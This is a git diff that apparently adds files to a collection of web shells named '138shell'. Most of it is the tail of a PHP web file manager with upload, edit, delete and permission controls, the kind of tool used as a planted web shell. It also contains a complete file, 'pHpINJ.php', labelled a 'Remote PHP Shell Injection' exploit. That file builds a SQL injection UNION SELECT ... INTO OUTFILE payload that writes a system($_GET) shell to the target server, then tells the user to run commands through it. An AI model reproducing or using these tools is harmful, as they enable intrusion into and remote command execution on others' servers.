+	case  8: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\5\207B\42\245\0\0;\0"; break;
+	case  9: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\30\214o\200\313\355\255\236\234,\322+-\336K\371\360q\342H\226\346\211r\5\0;\0"; break;
+	case 10: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\12\207\304\242\260\0\0;\0"; break;
+	case 11: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\12\207\304\140\1\0;\0"; break;
+	case 12: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 13: $image .= "\21\0\15\0\221\3\0\314\0\0\377\377\377\231\231\231\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
+	case 14: $image .= "\21\0\15\0\242\4\0\231\231\231\377\377\377\0\0\0\314\0\0\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\21\0\15\0\0\3\71H\12\334\254\60\202@\353\213p\212-\302\4\330RYM8\15\3\305y\46\205\216,\204\316s\260\305\12M\217 6\5/[\247\47\1\246\140\304\314\210\63l\301,\46\207\224\230\0\0;\0"; break;
+	case 15: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\314\314\314\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2*\234\217\231\300\254\33b\4\317\264\213\235\225\274\13:\0\201@\226\46\11\212\347\372m\354\231\216o\31\317\264k\267a\216\36\331o(\0\0;\0"; break;
+	case 16: $image .= "\21\0\15\0\221\2\0\0\0\0\377\377\0\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\21\0\15\0\0\2,\224\217\251\2\355\260\14\10\263\322\65\203\336\32\246\7\66_\325P\245x\224\34\207J\344vzi\7wJf\342\62\202\263\21\23\372\11\17\5\0;\0"; break;
+	case  0:
+	default: $image .= "\23\0\22\0\200\1\0\0\0\0\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\20\214\217\251\313\355\17\243\234\264\332\213\263\336\274\327\2\0;\0"; break;
+	}
+	return $image;
+}
+
+function tree_hassubdirs ($path) {
+	if ($p = @opendir($path)) {
+		while (($filename = readdir($p)) !== FALSE) {
+			if (tree_isrealdir($path . $filename)) return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+function tree_isrealdir ($path) {
+	if (basename($path) != '.' && basename($path) != '..' && @is_dir($path) && !@is_link($path)) return TRUE; else return FALSE;
+}
+
+function treeview () {
+	global $self, $treeroot;
+	if (isset($_GET['plus']))	tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['plus']);
+	if (isset($_GET['minus']))	$dirchanged = tree_minus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['minus']); else $dirchanged = FALSE;
+	for ($d = $_SESSION['dir']; strlen($d = dirname($d)) != 1; tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $d));
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title>Treeview</title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+	-->
+	</style>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($dirchanged) echo(" '$self?noupdate=TRUE&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . "'))\""); ?>>
+	<table border="0" cellspacing="0" cellpadding="0">
+<?php
+	tree_showtree($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot, 0, tree_calculatenumcols($_SESSION['tree'], $treeroot, 0));
+?>
+	</table>
+</body>
+</html>
+<?php
+	return;
+}
+
+function frameset () {
+	global $self;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Frameset//EN">
+<html>
+<head>
+	<title><?php echo($self); ?></title>
+</head>
+<frameset cols="250,*">
+	<frame src="<?php echo("$self?frame=treeview&" . SID . '#' . urlencode($_SESSION['dir'])); ?>" name="treeview">
+	<frame src="<?php echo("$self?" . SID); ?>" name="webadmin">
+</frameset>
+</html>
+<?php
+	return;
+}
+
+function tree_calculatenumcols ($tree, $path, $col) {
+	static $numcols = 0;
+	if ($col > $numcols) $numcols = $col; 
+	if (isset($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$numcols = tree_calculatenumcols($tree, $path . $tree[$path][$i], $col + 1);
+		}
+	} 
+	return $numcols;
+}
+
+function tree_showtree ($tree, $hassubdirs, $path, $col, $numcols) {
+	global $self, $treeroot;
+	static $islast = array(0 => TRUE);
+	echo("	<tr>\n");
+	for ($i = 0; $i < $col; $i++) {
+		if ($islast[$i]) $iid = 0; else $iid = 3;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if ($hassubdirs[$path]) {
+		if (!empty($tree[$path])) { $action = 'minus'; $iid = 8; } else { $action = 'plus'; $iid = 7; }
+		if ($col == 0) $iid -= 3; else if ($islast[$col]) $iid += 3;
+		echo("		<td><a href=\"$self?frame=treeview&$action=" . urlencode($path) . '&dir=' . urlencode($_SESSION['dir']) . '&' . SID . '#' . urlencode($path) . '">');
+		echo("<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">");
+		echo("</a></td>\n");
+	} else {
+		if ($islast[$col]) $iid = 9; else $iid = 6;
+		echo("		<td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
+	}
+	if (@is_readable($path)) {
+		$a1 = "<a name=\"" . urlencode($path) . "\" href=\"$self?dir=" . urlencode($path) . '&' . SID . '" target="webadmin">';
+		$a2 = '</a>';
+	} else {
+		$a1 = $a2 = '';
+	}
+	if ($_SESSION['dir'] == $path) $iid = 2; else $iid = 1;
+	echo("		<td>$a1<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">$a2</td>\n");
+	$cspan = $numcols - $col + 1;
+	if ($cspan > 1) $colspan = " colspan=\"$cspan\""; else $colspan = '';
+	if ($col == $numcols) $width = ' width="100%"'; else $width = '';
+	echo("		<td$width$colspan nowrap>&nbsp;");
+	if ($path == $treeroot) $label = $path; else $label = basename($path);
+	echo($a1 . htmlentities($label) . $a2);
+	echo("</td>\n");
+	echo("	</tr>\n");
+	if (!empty($tree[$path])) {
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			if (($i + 1) == sizeof($tree[$path])) $islast[$col + 1] = TRUE; else $islast[$col + 1] = FALSE;
+			tree_showtree($tree, $hassubdirs, $path . $tree[$path][$i], $col + 1, $numcols);
+		}
+	}
+	return;
+}
+
+function tree_plus (&$tree, &$hassubdirs, $p) {
+	if ($path = spath(realpath($p))) {
+		$tree[$path] = tree_getsubdirs($path);
+		for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+			$subdir = $path . $tree[$path][$i];
+			if (empty($hassubdirs[$subdir])) $hassubdirs[$subdir] = tree_hassubdirs($subdir);
+		}
+	}
+	return;
+}
+
+function tree_minus (&$tree, &$hassubdirs, $p) {
+	$dirchanged = FALSE;
+	if ($path = spath(realpath($p))) {
+		if (!empty($tree[$path])) {
+			for ($i = 0; $i < sizeof($tree[$path]); $i++) {
+				$subdir = $path . $tree[$path][$i] . '/';
+				if (isset($hassubdirs[$subdir])) $hassubdirs[$subdir] = NULL;
+			}
+			$tree[$path] = NULL;
+			if (substr($_SESSION['dir'], 0, strlen($path)) == $path) {
+				$_SESSION['dir'] = $path;
+				$dirchanged = TRUE;
+			}
+		}
+	}
+	return $dirchanged;
+}
+
+function tree_getsubdirs ($path) {
+	$subdirs = array();
+	if ($p = @opendir($path)) {
+		for ($i = 0; ($filename = readdir($p)) !== FALSE;) {
+			if (tree_isrealdir($path . $filename)) $subdirs[$i++] = $filename . '/';
+		}
+	}
+	sort($subdirs);
+	return $subdirs;
+}
+
+function show ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		header('Content-Type: ' . getmimetype($file));
+		if (@readfile($file) !== FALSE) return TRUE;
+	}
+	return FALSE;
+}
+
+function show_highlight ($file) {
+	global $words;
+	if (@is_readable($file) && @is_file($file)) {
+		header('Content-Disposition: filename=' . basename($file));
+		echo("<html>\n<head><title>");
+		echo(buildphrase(array('&quot;' . htmlentities(basename($file)) . '&quot;'), $words['sourceof']));
+		echo("</title></head>\n<body>\n<table cellpadding=\"4\" border=\"0\">\n<tr>\n<td>\n<code style=\"color: #999999\">\n");
+		$size = sizeof(file($file));
+		for ($i = 1; $i <= $size; $i++) printf("%05d<br>\n", $i);
+		echo("</code>\n</td>\n<td nowrap>\n");
+		$shown = @highlight_file($file);
+		echo("\n");
+		echo("</td>\n</tr>\n</table>\n");
+		echo("</body>\n");
+		echo("</html>");
+		if ($shown) return TRUE;
+	}
+	return FALSE;
+}
+
+function getmimetype ($file) {
+	/* $mime = 'application/octet-stream'; */
+	$mime = 'text/plain';
+	$ext = substr($file, strrpos($file, '.') + 1);
+	if (@is_readable('/etc/mime.types')) {
+		$f = fopen('/etc/mime.types', 'r');
+		while (!feof($f)) {
+			$line = fgets($f, 4096);
+			$found = FALSE;
+			$mim = strtok($line," \n\t");
+			$ex = strtok(" \n\t");
+			while ($ex && !$found) {
+				if (strtolower($ex) == strtolower($ext)) {
+					$found = TRUE;
+					$mime = $mim;
+					break;
+				}
+				$ex = strtok(" \n\t");
+			}
+			if ($found) break;
+		}
+		fclose($f);
+	}
+	return $mime;
+}
+
+function dirlisting ($inaframe = FALSE) {
+	global $self, $homedir, $words;
+	global $error, $notice;
+	$p = '&' . SID;
+	html_header($_SESSION['dir']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo("<a href=\"$self?dir=" . urlencode($homedir) . "$p\">" . $words['dir']); ?></a>:&nbsp;</td>
+				<td><input type="text" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>" size="<?php echo(textfieldsize($_SESSION['dir'])); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php if (@is_writable($_SESSION['dir'])) { ?>
+	<form action="<?php echo($self); ?>" method="post" enctype="multipart/form-data">
+	<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+	<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>&nbsp;</td>
+				<td><input type="file" name="upload">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['upload']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE">
+			</form>
+			<form action="<?php echo($self); ?>" method="get">
+			<input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
+			<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+<?php if (isset($_REQUEST['frame'])) { ?>
+			<input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
+<?php } ?>
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td>
+					<select name="type" size="1">
+					<option value="file"><?php echo($words['file']); ?>
+
+					<option value="dir" selected><?php echo($words['dir']); ?>
+
+					</select>&nbsp;
+				</td>
+				<td><input type="text" name="create">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	}
+	if (empty($_GET['sort'])) $sort = 'filename'; else $sort = $_GET['sort'];
+	$reverse = @$_GET['reverse'];
+	$GLOBALS['showsize'] = FALSE;
+	if ($files = dirtoarray($_SESSION['dir'])) {
+		$files = sortfiles($files, $sort, $reverse);
+		outputdirlisting($_SESSION['dir'], $files, $inaframe, $sort, $reverse);
+	} else {
+		perror(buildphrase('&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot', $words['readingerror']));
+	}
+	if ($inaframe) {
+		pnotice("<a href=\"$self?action=treeoff&" . SID . '" target="_top">' . $words['treeoff'] . '</a>');
+	} else {
+		pnotice("<a href=\"$self?action=treeon&" . SID . '" target="_top">' . $words['treeon'] . '</a>');
+	}
+	html_footer(FALSE);
+	return;
+}
+
+function dirtoarray ($dir) {
+	if ($dirstream = @opendir($dir)) {
+		for ($n = 0; ($filename = readdir($dirstream)) !== FALSE; $n++) {
+			$stat = @lstat($dir . $filename);
+			$files[$n]['filename']     = $filename;
+			$files[$n]['fullfilename'] = $fullfilename = relpathtoabspath($filename, $dir);
+			$files[$n]['is_file']      = @is_file($fullfilename);
+			$files[$n]['is_dir']       = @is_dir($fullfilename);
+			$files[$n]['is_link']      = $islink = @is_link($dir . $filename);
+			if ($islink) {
+				$files[$n]['readlink'] = @readlink($dir . $filename);
+				$files[$n]['linkinfo'] = linkinfo($dir . $filename);
+			}
+			$files[$n]['is_readable']   = @is_readable($fullfilename);
+			$files[$n]['is_writable']   = @is_writable($fullfilename);
+			$files[$n]['is_executable'] = @is_executable($fullfilename);
+			$files[$n]['permission']    = $islink ? 'lrwxrwxrwx' : octtostr(@fileperms($dir . $filename));
+			if (substr($files[$n]['permission'], 0, 1) != '-') {
+				$files[$n]['size'] = -1;
+			} else {
+				$files[$n]['size'] = @$stat['size'];
+				$GLOBALS['showsize'] = TRUE;
+			}
+			$files[$n]['owner']         = $owner = @$stat['uid'];
+			$files[$n]['group']         = $group = @$stat['gid'];
+			$files[$n]['ownername']     = @reset(posix_getpwuid($owner));
+			$files[$n]['groupname']     = @reset(posix_getgrgid($group));
+		}
+		closedir($dirstream);
+		return $files;
+	} else {
+		return FALSE;
+	}
+}
+
+function outputdirlisting ($dir, $files, $inaframe, $sort, $reverse) {
+	global $self, $words;
+	$uid = posix_getuid();
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+<?php
+	if ($inaframe) $p = '&notreeupdate=TRUE&'; $p = ''; $p .= SID . '&dir=' . urlencode($dir);
+	echo("	<tr>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><img src=\"$self?imageid=16\" width=\"17\" height=\"13\"></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=filename&reverse=" . (($sort == 'filename') ? !$reverse : 0) . "&$p\"><b>{$words['filename']}</b></a></td>\n");
+	if ($GLOBALS['showsize']) echo("		<td bgcolor=\"#EEEEEE\" align=\"right\"><a href=\"$self?sort=size&reverse=" . (($sort == 'size') ? !$reverse : 0) . "&$p\"><b>{$words['size']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=permission&reverse=" . (($sort == 'permission') ? !$reverse : 0) . "&$p\"><b>{$words['permission']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=owner&reverse=" . (($sort == 'owner') ? !$reverse : 0) . "&$p\"><b>{$words['owner']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=group&reverse=" . (($sort == 'group') ? !$reverse : 0) . "&$p\"><b>{$words['group']}</b></a></td>\n");
+	echo("		<td bgcolor=\"#EEEEEE\"><b>{$words['functions']}</b></td>\n");
+	echo("	</tr>\n");
+	$p = '&' . SID;
+	if ($GLOBALS['showsize']) $cspan = ' colspan="2"'; else $cspan = '';
+	foreach ($files as $file) {
+		echo("	<tr>\n");
+		if ($file['is_link']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=14\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">");
+			if ($file['is_dir']) echo('[ ');
+			echo($file['filename']);
+			if ($file['is_dir']) echo(' ]');
+			echo(' -&gt; ');
+			if ($file['is_dir']) {
+				echo('[ ');
+				if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['readlink']) . "$p\">");
+				echo(htmlentities($file['readlink']));
+				if ($file['is_readable']) echo('</a>');
+				echo(' ]');
+			} else {
+				if (dirname($file['readlink']) != '.') {
+					if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode(dirname($file['readlink'])) . "$p\">");
+					echo(htmlentities(dirname($file['readlink'])) . '/');
+					if ($file['is_readable']) echo('</a>');
+				}
+				if (strlen(basename($file['readlink'])) != 0) {
+					if ($file['is_file'] && $file['is_readable']) echo("<a href=\"$self?show=" . urlencode($file['readlink']) . "$p\">");
+					echo(htmlentities(basename($file['readlink'])));
+					if ($file['is_file'] && $file['is_readable']) echo('</a>');
+				}
+				if ($file['is_file'] && is_script($file['readlink'])) echo(" <a href=\"$self?showh=" . urlencode($file['readlink']) . "$p\">*</a>");
+			}
+			echo("</td>\n");
+		} elseif ($file['is_dir']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=15\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">[ ");
+			if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable']) echo('</a>');
+			echo(" ]</td>\n");
+		} else {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=");
+			if (substr($file['filename'], 0, 1) == '.') echo('13'); else echo('12');
+			echo("\" width=\"17\" height=\"13\"></td>\n");
+			echo('		<td');
+			if (substr($file['permission'], 0, 1) != '-') echo($cspan);
+			echo(' bgcolor="#FFFFFF">');
+			if ($file['is_readable'] && $file['is_file']) echo("<a href=\"$self?show=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable'] && $file['is_file']) echo('</a>');
+			if ($file['is_file'] && is_script($file['filename'])) echo(" <a href=\"$self?showh=" . urlencode($file['fullfilename']) . "$p\">*</a>");
+			echo("</td>\n");
+			if ($GLOBALS['showsize'] && $file['is_file']) {
+				echo("		<td bgcolor=\"#FFFFFF\" align=\"right\" nowrap>");
+				if ($file['is_file']) echo("{$file['size']} B");
+				echo("</td>\n"); 
+			}
+		}
+		echo('		<td bgcolor="#FFFFFF" class="perm">');
+		if ($uid == $file['owner'] && !$file['is_link']) echo("<a href=\"$self?permission=" . urlencode($file['fullfilename']) . "$p\">");
+		echo($file['permission']);
+		if ($uid == $file['owner'] && !$file['is_link']) echo('</a>');
+		echo("</td>\n");
+		$owner = ($file['ownername'] == NULL) ? $file['owner'] : $file['ownername'];
+		$group = ($file['groupname'] == NULL) ? $file['group'] : $file['groupname'];
+		echo('		<td bgcolor="#FFFFFF">' . $owner . "</td>\n");
+		echo('		<td bgcolor="#FFFFFF">' . $group . "</td>\n");
+		$f = "<a href=\"$self?symlinktarget=" . urlencode($dir . $file['filename']). "$p\">{$words['createsymlink']}</a> | ";;
+		if ($file['filename'] != '.' && $file['filename'] != '..') {
+			if ($file['is_readable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?cpy=" . urlencode($file['fullfilename']). "$p\">{$words['copy']}</a> | ";
+			}
+			if ($uid == $file['owner']) {
+				$f .= "<a href=\"$self?move=" . urlencode($file['fullfilename']) . "$p\">{$words['move']}</a> | ";
+				$f .= "<a href=\"$self?delete=" . urlencode($dir . $file['filename']). "$p\">{$words['delete']}</a> | ";
+			}
+			if ($file['is_writable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . "$p\">{$words['edit']}</a> | ";
+			}
+		}
+		if ($file['is_dir'] && @is_file($file['fullfilename'] . '.htaccess') && @is_writable($file['fullfilename'] . '.htaccess')) {
+			$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . '.htaccess' . "$p\">{$words['configure']}</a> | ";
+		}
+		if (!empty($f)) $f = substr($f, 0, strlen($f) - 3); else $f = '&nbsp;';
+		echo("		<td bgcolor=\"#FFFFFF\" nowrap>$f</td>\n");
+		echo("	</tr>\n");
+	}
+?>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function sortfiles ($files, $sort, $reverse) {
+	$files = sortfield($files, $sort, $reverse, 0, sizeof($files) - 1);
+	if ($sort != 'filename') {
+		$old = $files[0][$sort]; $oldpos = 0;
+		for ($i = 1; $i < sizeof($files); $i++) {
+			if ($old != $files[$i][$sort]) {
+				if ($oldpos != ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+				$oldpos = $i;
+			}
+			$old = $files[$i][$sort];
+		}
+		if ($oldpos < ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+	}
+	return $files;
+}
+
+function octtostr ($mode) {
+	if     (($mode & 0xC000) === 0xC000) $type = 's'; /* Unix domain socket */
+	elseif (($mode & 0x4000) === 0x4000) $type = 'd'; /* Directory */
+	elseif (($mode & 0xA000) === 0xA000) $type = 'l'; /* Symbolic link */
+	elseif (($mode & 0x8000) === 0x8000) $type = '-'; /* Regular file */
+	elseif (($mode & 0x6000) === 0x6000) $type = 'b'; /* Block special file */
+	elseif (($mode & 0x2000) === 0x2000) $type = 'c'; /* Character special file */
+	elseif (($mode & 0x1000) === 0x1000) $type = 'p'; /* Named pipe */
+	else                                 $type = '?'; /* Unknown */
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) $owner .= ($mode & 00100) ? 's' : 'S'; else $owner .= ($mode & 00100) ? 'x' : '-';
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) $group .= ($mode & 00010) ? 's' : 'S'; else $group .= ($mode & 00010) ? 'x' : '-';
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) $other .= ($mode & 00001) ? 't' : 'T'; else $other .= ($mode & 00001) ? 'x' : '-';
+	return $type . $owner . $group . $other;
+}
+
+function sortfield ($field, $column, $reverse, $left, $right){
+	$g = $field[(int) (($left + $right) / 2)][$column];
+	$l = $left; $r = $right;
+	while ($l <= $r) {
+		if ($reverse) {
+			while (($l < $right) && ($field[$l][$column] > $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] < $g)) $r--;
+		} else {
+			while (($l < $right) && ($field[$l][$column] < $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] > $g)) $r--;
+		}
+		if ($l < $r) {
+			$tmp = $field[$r];
+			$field[$r] = $field[$l];
+			$field[$l] = $tmp;
+			$r--;
+			$l++;
+		} else {
+			$l++;
+		}
+	}
+	if ($r > $left) $field = sortfield($field, $column, $reverse, $left, $r);
+	if ($r + 1 < $right) $field = sortfield($field, $column, $reverse, $r + 1, $right);
+	return $field;
+}
+
+function buildphrase ($repl, $str) {
+	if (!is_array($repl)) $repl = array($repl);
+	$newstr = ''; $prevz = ' ';
+	for ($i = 0; $i < strlen($str); $i++) {
+		$z = substr($str, $i, 1);
+		if (((int) $z) > 0 && ((int) $z) <= count($repl) && $prevz == ' ') $newstr .= $repl[((int) $z) - 1]; else $newstr .= $z;
+		$prevz = $z;
+	}
+	return $newstr;
+}
+
+function html_header ($action) {
+	global $self;
+	global $error, $notice, $updatetreeview;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title><?php echo("$self - $action"); ?></title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+		.perm { font-family: monospace; font-size: 10pt; }
+	-->
+	</style>
+<?php
+	if (isset($_REQUEST['edit']) && !isset($_POST['save']) && basename($edit = $_REQUEST['edit']) == '.htaccess') {
+		$file = dirname($edit) . '/.htpasswd';
+?>
+	<script type="text/javascript" language="JavaScript">
+	<!--
+	function autheinf () {
+		document.f.content.value += "Authtype Basic\nAuthName \"Restricted Directory\"\n";
+		document.f.content.value += "AuthUserFile <?php echo(htmlentities($file)); ?>\n";
+		document.f.content.value += "Require valid-user";
+	}
+	//-->
+	</script>
+<?php
+	}
+?>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($updatetreeview && !empty($_SESSION['tree'])) echo(" '$self?frame=treeview&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . '#' . urlencode($_SESSION['dir']) . "'))\""); ?>>
+<?php
+	if (!empty($error)) perror($error);
+	if (!empty($notice)) pnotice($notice);
+	return;
+}
+
+function html_footer ($backbutton = TRUE) {
+	global $self, $words;
+	if ($backbutton) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#EEEEEE">
+	<a href="<?php echo("$self?id=". $_REQUEST['id']); ?>"><?php echo($words['back']); ?></a>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	}
+?>
+</body>
+</html>
+<?php
+	return;
+}
+
+function perror ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#FFCCCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function pnotice ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#CCFFCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+?>
diff --git a/138shell/P/pHpINJ.php.txt b/138shell/P/pHpINJ.php.txt
new file mode 100644
index 0000000..b54acc6
--- /dev/null
+++ b/138shell/P/pHpINJ.php.txt
@@ -0,0 +1,37 @@
+<?php
+?>
+<html>
+<head>
+<title>|| .::News Remote PHP Shell Injection::. ||   </title>
+</head>
+<body>
+<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />
+<?php
+if (isset($_POST['url'])) {
+$url = $_POST['url'];
+$path2news = $_POST['path2news'];
+$outfile = $_POST ['outfile'];
+$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
+$sql = urlencode($sql);
+$expurl= $url."?id=".$sql ;
+echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
+echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
+}
+else
+{
+?>
+Url to index.php: <br /> 
+<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
+<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
+Server Path to Shell: <br />
+Full server path to a writable file which will contain the Php Shell <br />
+<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
+<input type = "submit" value = "Create Exploit"> <br /> <br />
+
+
+
+<?php
+}
+?>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/P/perlbot.pl.txt b/138shell/P/perlbot.pl.txt
new file mode 100644
index 0000000..1c590e0
